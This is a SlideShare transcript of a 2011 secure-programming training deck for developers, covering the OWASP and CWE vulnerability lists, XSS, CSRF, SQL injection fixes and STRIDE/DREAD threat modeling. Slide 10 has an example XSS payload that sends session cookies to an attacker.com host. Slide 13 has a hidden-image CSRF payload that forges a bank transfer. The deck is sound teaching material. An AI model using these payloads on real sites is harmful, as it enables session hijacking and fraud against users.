Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.
Security 101 Cozi Tech Forum 2011-02-02 George V. Reilly  &  Andrew Abrahamowicz www.Cozi.com
Agenda <ul><ul><li>Why should we care about Security? </li></ul></ul><ul><ul><li>Top Vulnerabilities of 2010 </li></ul></u...
Off Topic <ul><ul><li>Operational Security </li></ul></ul><ul><ul><li>Cryptography </li></ul></ul><ul><ul><li>Hacking Tuto...
Why should we care about Security? <ul><ul><li>Just because we haven’t been hacked yet, doesn’t mean it won’t happen </li>...
24 Deadly Sins of Software Security <ul><ul><li>SQL Injection </li></ul></ul><ul><ul><li>Server Vulns: XSS, XSRF, Response...
2010 CWE Top 25 Most Dangerous <ul><ul><li>Cross-Site Scripting (XSS) </li></ul></ul><ul><ul><li>SQL Injection </li></ul><...
OWASP Top 10 App Security Risks—2010 <ul><ul><li>Injection </li></ul></ul><ul><ul><li>Cross-Site Scripting </li></ul></ul>...
Some General Principles <ul><ul><li>Never  trust input – validate </li></ul></ul><ul><ul><li>Defense in Depth </li></ul></...
XSS – Cross-Site Scripting <ul><ul><li>App accepts data from untrusted source without validation  </li></ul></ul><ul><ul><...
XSS Scenario <ul><ul><li>The app uses untrusted data without  validation  or  escaping : </li></ul></ul><ul><ul><li>page +...
XSS Redemption <ul><ul><li>Restrict the input to valid data. </li></ul></ul><ul><ul><ul><li>Use  whitelists , not  blackli...
XSRF – Cross-Site Request Forgery <ul><ul><li>XSS – Client trusts server to do the right thing </li></ul></ul><ul><ul><li>...
XSRF Scenario <ul><ul><li>App allows user to submit a state-changing request without a secret </li></ul></ul><ul><ul><ul><...
XSRF Redemption <ul><ul><li>Add a secret random value ( nonce ) to webclient and webserver session. </li></ul></ul><ul><ul...
SQL Injection
SQL Injection Redemption <ul><ul><li>Never use string concatenation/replacement in SQL expressions </li></ul></ul><ul><ul>...
Threat Modeling <ul><ul><li>You cannot build a secure system until you understand your threats </li></ul></ul><ul><ul><li>...
Categorize Threats with STRIDE <ul><ul><li>S poofing Identity </li></ul></ul><ul><ul><li>T ampering with Data </li></ul></...
Use DREAD to Calculate Risk <ul><ul><li>Risk = Criticality * Likelihood of Occurrence </li></ul></ul><ul><ul><li>D amage P...
Upcoming SlideShare
Loading in …5
×

Security 101

2,957 views

Published on

Introduction to Secure Programming for Developers. Made to Cozi Development Team.

Published in: Technology
  • Be the first to comment

Security 101

  1. 1. Security 101 Cozi Tech Forum 2011-02-02 George V. Reilly  &  Andrew Abrahamowicz www.Cozi.com
  2. 2. Agenda <ul><ul><li>Why should we care about Security? </li></ul></ul><ul><ul><li>Top Vulnerabilities of 2010 </li></ul></ul><ul><ul><li>Examining XSS, XSRF, and SQL Injection </li></ul></ul><ul><ul><li>Threat Modeling </li></ul></ul>
  3. 3. Off Topic <ul><ul><li>Operational Security </li></ul></ul><ul><ul><li>Cryptography </li></ul></ul><ul><ul><li>Hacking Tutorial </li></ul></ul>
  4. 4. Why should we care about Security? <ul><ul><li>Just because we haven’t been hacked yet, doesn’t mean it won’t happen </li></ul></ul><ul><ul><li>Defender has to get everything right; attacker has to find only one weakness </li></ul></ul><ul><ul><li>Loss of trust, reputation </li></ul></ul><ul><ul><li>Damage to our systems </li></ul></ul><ul><ul><li>Customer or company data exposed </li></ul></ul><ul><ul><li>Possible financial liability </li></ul></ul>
  5. 5. 24 Deadly Sins of Software Security <ul><ul><li>SQL Injection </li></ul></ul><ul><ul><li>Server Vulns: XSS, XSRF, Response Splitting </li></ul></ul><ul><ul><li>Web Client Vulns: XSS </li></ul></ul><ul><ul><li>Magic URLs, Predictable Cookies, Hidden Form Fields </li></ul></ul><ul><ul><li>Buffer Overruns </li></ul></ul><ul><ul><li>Format String Problems </li></ul></ul><ul><ul><li>Integer Overflows </li></ul></ul><ul><ul><li>C++ Catastrophes </li></ul></ul><ul><ul><li>Catching Exceptions </li></ul></ul><ul><ul><li>Command Injection </li></ul></ul><ul><ul><li>Failure to Handle Errors Correctly </li></ul></ul><ul><ul><li>Information Leakage </li></ul></ul><ul><ul><li>Race Conditions </li></ul></ul><ul><ul><li>Poor Usability </li></ul></ul><ul><ul><li>Not Updating Easily </li></ul></ul><ul><ul><li>Executing Code with Too Much Privilege </li></ul></ul><ul><ul><li>Failure to Protect Stored Data </li></ul></ul><ul><ul><li>The Sins of Mobile Code </li></ul></ul><ul><ul><li>Use of Weak Password-Based Systems </li></ul></ul><ul><ul><li>Weak Random Numbers </li></ul></ul><ul><ul><li>Using Cryptography Incorrectly </li></ul></ul><ul><ul><li>Failing to Protect Network Traffic </li></ul></ul><ul><ul><li>Improper Use of PKI, esp SSL </li></ul></ul><ul><ul><li>Trusting Network Name Resolution </li></ul></ul>
  6. 6. 2010 CWE Top 25 Most Dangerous <ul><ul><li>Cross-Site Scripting (XSS) </li></ul></ul><ul><ul><li>SQL Injection </li></ul></ul><ul><ul><li>Classic Buffer Overflow </li></ul></ul><ul><ul><li>Cross-Site Request Forgery </li></ul></ul><ul><ul><li>Improper Access Control </li></ul></ul><ul><ul><li>Reliance on Untrusted Inputs </li></ul></ul><ul><ul><li>Path Traversal </li></ul></ul><ul><ul><li>Uploading Dangerous Files </li></ul></ul><ul><ul><li>OS Command Injection </li></ul></ul><ul><ul><li>Missing Encryption </li></ul></ul><ul><ul><li>Hard-Coded Credentials </li></ul></ul><ul><ul><li>Buffer Access with Incorrect Length Value </li></ul></ul><ul><ul><li>PHP File Inclusion </li></ul></ul><ul><ul><li>Array Index Validation </li></ul></ul><ul><ul><li>Not Handling Errors </li></ul></ul><ul><ul><li>Info Exposure via Error Msgs </li></ul></ul><ul><ul><li>Integer Overflow/Wraparound </li></ul></ul><ul><ul><li>Incorrect Calc of Buffer Size </li></ul></ul><ul><ul><li>Missing Auth for Critical Fn </li></ul></ul><ul><ul><li>Download Code w/o Integrity Chk </li></ul></ul><ul><ul><li>Incorrect Permissions </li></ul></ul><ul><ul><li>Alloc Resources w/o Limits </li></ul></ul><ul><ul><li>Open Redirect to Untrusted Site </li></ul></ul><ul><ul><li>Using Poor Crypto </li></ul></ul><ul><ul><li>Race Condition </li></ul></ul>
  7. 7. OWASP Top 10 App Security Risks—2010 <ul><ul><li>Injection </li></ul></ul><ul><ul><li>Cross-Site Scripting </li></ul></ul><ul><ul><li>Broken Auth and Session Mgmt </li></ul></ul><ul><ul><li>Insecure Direct Object References </li></ul></ul><ul><ul><li>Cross Site Request Forgery (CSRF or XSRF) </li></ul></ul><ul><ul><li>Security Misconfiguration </li></ul></ul><ul><ul><li>Insecure Cryptographic Storage </li></ul></ul><ul><ul><li>Failure to Restrict URL Access </li></ul></ul><ul><ul><li>Insufficient Transport Layer Protection </li></ul></ul><ul><ul><li>Unvalidated Redirects and Forwards </li></ul></ul>
  8. 8. Some General Principles <ul><ul><li>Never trust input – validate </li></ul></ul><ul><ul><li>Defense in Depth </li></ul></ul><ul><ul><li>Least Privilege </li></ul></ul><ul><ul><li>Learn from Mistakes </li></ul></ul><ul><ul><li>Minimize your Attack Surface </li></ul></ul>
  9. 9. XSS – Cross-Site Scripting <ul><ul><li>App accepts data from untrusted source without validation  </li></ul></ul><ul><ul><li>App fails to escape data before generating page </li></ul></ul><ul><ul><ul><li>Blur distinction between data and code </li></ul></ul></ul><ul><ul><li>Attacker injects malicious script into webpage </li></ul></ul><ul><ul><li>Gains access to sensitive page content, session cookies, etc. </li></ul></ul>
  10. 10. XSS Scenario <ul><ul><li>The app uses untrusted data without validation or escaping : </li></ul></ul><ul><ul><li>page += &quot;〈input name='creditcard' type='TEXT' value='&quot; + request.getParameter(&quot;CC&quot;) + &quot;'〉&quot;; </li></ul></ul><ul><ul><li>Attacker modifies the ‘CC’ parameter: </li></ul></ul><ul><ul><li>'〉〈script〉document.location= 'http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie〈/script〉'. </li></ul></ul><ul><ul><li>Victim clicks attacker's link </li></ul></ul><ul><ul><li>Sends session ID to attacker’s website, allowing attacker to hijack user’s current session. </li></ul></ul>
  11. 11. XSS Redemption <ul><ul><li>Restrict the input to valid data. </li></ul></ul><ul><ul><ul><li>Use  whitelists , not  blacklists </li></ul></ul></ul><ul><ul><ul><li>Validate with regexes </li></ul></ul></ul><ul><ul><li>Encode the output </li></ul></ul><ul><ul><ul><li>Use HTML encoding or URL encoding </li></ul></ul></ul><ul><ul><li>For input that goes into response headers, aggressively remove CRLFs. </li></ul></ul>
  12. 12. XSRF – Cross-Site Request Forgery <ul><ul><li>XSS – Client trusts server to do the right thing </li></ul></ul><ul><ul><li>XSRF – Server has too much trust in client </li></ul></ul><ul><ul><li>Server can’t tell whether request was physically initiated by the user, or if an attacker caused the browser to initiate the operation. </li></ul></ul>
  13. 13. XSRF Scenario <ul><ul><li>App allows user to submit a state-changing request without a secret </li></ul></ul><ul><ul><ul><li>http://example.com/app/transferFunds?amount=1500&destinationAccount=4673243243 </li></ul></ul></ul><ul><ul><li>Bad img/iframe on attacker-controlled site </li></ul></ul><ul><ul><ul><li>〈 img src=&quot;http://example.com/app/transferFunds?amount=1500&destinationAccount=attackersAcct#&quot; width=&quot;0&quot; /〉 </li></ul></ul></ul><ul><ul><li>If victim visits a controlled site while already authenticated to example.com, any forged requests will include the user’s session info, inadvertently authorizing the request. </li></ul></ul>
  14. 14. XSRF Redemption <ul><ul><li>Add a secret random value ( nonce ) to webclient and webserver session. </li></ul></ul><ul><ul><ul><li>Do not include secret in a cookie </li></ul></ul></ul><ul><ul><li>Add a timeout to the session </li></ul></ul><ul><ul><li>Use POST rather than GET </li></ul></ul>
  15. 15. SQL Injection
  16. 16. SQL Injection Redemption <ul><ul><li>Never use string concatenation/replacement in SQL expressions </li></ul></ul><ul><ul><li>Never trust input -- potentially difficult </li></ul></ul><ul><ul><li>Use prepared (aka parameterized) SQL statements </li></ul></ul><ul><ul><ul><li>ORMs like SQLAlchemy, NHibernate do this </li></ul></ul></ul><ul><ul><li>Perhaps encrypt the underlying data </li></ul></ul><ul><ul><ul><li>Defense in depth in case of breach </li></ul></ul></ul>
  17. 17. Threat Modeling <ul><ul><li>You cannot build a secure system until you understand your threats </li></ul></ul><ul><ul><li>STRIDE – Categorize </li></ul></ul><ul><ul><li>DREAD – Calculate Risk </li></ul></ul><ul><ul><li>Examine  data flow </li></ul></ul>
  18. 18. Categorize Threats with STRIDE <ul><ul><li>S poofing Identity </li></ul></ul><ul><ul><li>T ampering with Data </li></ul></ul><ul><ul><li>R epudiation </li></ul></ul><ul><ul><li>I nformation Disclosure </li></ul></ul><ul><ul><li>D enial of Service </li></ul></ul><ul><ul><li>E levation of Privilege </li></ul></ul><ul><ul><li>STRIDE classifies effects; you should also categorize vulns according to cause </li></ul></ul>
  19. 19. Use DREAD to Calculate Risk <ul><ul><li>Risk = Criticality * Likelihood of Occurrence </li></ul></ul><ul><ul><li>D amage Potential </li></ul></ul><ul><ul><li>R eproducibility </li></ul></ul><ul><ul><li>E xploitability </li></ul></ul><ul><ul><li>A ffected Users </li></ul></ul><ul><ul><li>D iscoverability </li></ul></ul><ul><ul><li>Each factor 1-10. DREAD score = sum/5 </li></ul></ul>

×